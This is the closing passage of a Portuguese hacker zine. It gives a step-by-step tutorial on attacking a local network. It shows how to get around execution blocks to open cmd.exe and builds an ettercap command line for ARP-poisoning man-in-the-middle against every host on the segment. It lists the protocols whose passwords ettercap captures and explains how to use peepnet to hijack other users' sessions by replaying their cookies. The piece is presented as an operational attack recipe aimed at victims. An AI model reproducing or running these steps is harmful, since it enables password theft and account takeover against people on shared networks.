Para ver as variaveis de ambientes digite o comando set sem parametros. Se a lan utilizar aqueles gerenciadores que bloqueiam o executar, abra qualquer diretorio e faça uma pesquisa no sistema pelo interpretador (cmd.exe) na pasta do sistema (\windows\system32\) porque pesquisas normalmente nao sao bloqueadas. Execute ele e faça o mesmo esquema usando variaveis de ambiente para entrar no diretorio do ettercap, mas tira o cmd /k porque se nao voce vai criar um subshell, mas num tem nada, so falei para você saber (dã, todo mundo sabe disso).

No diretorio do ettercap digite a opçao -I maiusculo que significa interface, para ele exibir as interfaces de rede disponiveis, voce verá algo mais ou menos pareceido com isso:

List of available Network Interfaces:          //Lista de interfaces de rede disponiveis

 \Device\NPF_GenericDialupAdapter       Adapter for generic dialup and VPN captu re
 \Device\NPF_{0C95D153-9A2E-4593-95EF-9DC9C299E0C6}     VMware Virtual Ethernet Adapter
 \Device\NPF_{2C102038-8912-4C6D-B516-7BA2DD3B86DE}    VMware Virtual Ethernet Adapter
 \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}    VIA PCI 10/100Mb Fast Ethernet Adapter

Selecione a interface de rede que condiz com o mesmo seguimento de rede que a vitima está. Para setar uma interface de rede utilize a opçao -i minusculo que tambem significa interface, tipo assim:

ettercap -i  \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}   

Essa é a minha interface eth0, dã (10/100Mb). Logo a seleçao da interface de rede vamos setar a interface de usuario, ou seja, como o usuario vai ver as coisas acontecendo, nada de GTK pessoal, vamos usar a interface de texto mesmo e vamos utilizar a opçao q minusculo que é usada para  farejamento de trafego, com essa opçao apenas pegamos coisas importantes, como senhas, caso contrario voce ia ver muito lixo na tela. Ja a opçao -Q maiusculo nao nos mostra nada.

Deixe assim:

ettercap -i  \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}  -Tq

Agora vamos dizer para o ettercap qual o tipo de redirecionamento que iremos utilizar, nesse caso utilizaremos o arp poisoning. Para setar o redirecionamento use a opçao -M que vem de Man In The Middle. Agora voce me pergunta:
Mas temos que escrever Arp poisoning? A resposta e nao, basta digitar arp, devera ficar assim:


ettercap -i  \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}  -Tq -M arp 

Agora vamos usar a opçao -o "only" que significa apenas, vamos utilizar o -o porque queremos apenas fazer o redirecionamento de trafego, porque quem vai fareja é o peepnet. Mas se quisermos pegar senhas do pessoal na rede nao colocamos o -o. O ettercap pega senhas de muuuuitos protocolos, pega senhas de negociaçoes SSL (banco) atraves de MITM, pega senhas de VNC, entre outros, tais como:

RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG, TELNET, FTP, POP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, LDAP, NFS.

Voce ainda pode fazer ataques mitm contra dados tunelados por PPTP, mas vamos fazer apenas o arp poisoning. Podemos especificar os computadores que queremos redirecionar o trafego, mas como a açao tem que ser rapida e voce nao tem tempo de dar um IPconfig para ver como está configurado o range de IPs para saber qual o IP da maquina que ela esta usando, utilize apenas a sintaxe de broadcast que e o //, com o // ele faz o que e correspondendo a um scan por interface grafica, ou seja, ele manda um broadcast arp, pega os MAC e envenena os caras. Apesar de voce poder fazer uma especificaçao de alvo, isso nao vem ao caso agora. Deverá ficar assim:

ettercap -i  \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}  -Tq -M arp  -o //

A velocidade da açao é tudo. Nao vamos configurar o CaptureNet (por hora), apenas abra o CaptureNet e clique em start capture, depois que voce tiver capturando pacotes abra o peepnet, existe um botao na tela do programa escrito Go get it! A unica coisa que voce tera que fazer é selecinar a seçao que deseja capturar no lado esquerdo da tela clicar neste botao. Voce podera sequestrar seçoes de qualquer computador na LAN, o peepnet mostra até o cookie com o ID da seção, ou seja, tu poderas se logar novamente quando voce quiser, apenas se logando no cookie utilizando o opera por exemplo.

http://www.hunterhacker.xpg.com.br/Untitled-1.jpg



----- C4p1Tul0 15

========================================================================================================== THE 
                                                          END 
                                                 BY 6_Bl4ck9_f0x6

Se gostou da zine ou se gostou apenas de um artigo da zine, manda um email ae cara, pois se não tiver gente lendo me desmotiva bastante ficar escrevendo a zine, repito, se gostou da zine manda um mail ae b-fox@bol.com.br, se naum gostou também manda, se quer sugerir algo, quer mandar matérias, manda email ae for me que faço questão de publica-las. Gostaria de sua ajuda para a distribuição da C.O.D.E, pois a principal intenção dela é tentar transportar os tempos de ouro para a nossa época, espero ter conseguido com a ajuda da introdução da zine e do artigo Zines de ontem e de hoje, colocar em sua mente que fazer zines é legal, pois podemos nos expresar e ser ouvidos por outras pessoas que compartilham o mesmo gosto que nós, o hacking.  

Se quiser me xingar - Manda que publico 
Se quiser elogia       - Manda que publico
Se quiser perguntar - Manda que eu respondo, se eu nao souber, vou para o inferno atraz da informaçao para voces
Se eu tiver vacilado no texto - Manda que eu corrijo o erro e publico sua mensagem
Se quiserem mandar seus textos - Mandem que eu publico "se forem bons :-)"

                               Se nao quiserem ser identificados eu nao posto o remetente
                     Mas sempre usem um remailer galera, detesto ter que ficar camuflando email com *
             Mandem emails como se fossem o pato donald, super man e tals uhauhauhauh e mais legal 

===========================================================================================================
Abraçao Galera e ate a proxima ediçao da minha, da sua, da nossa C.O.D.E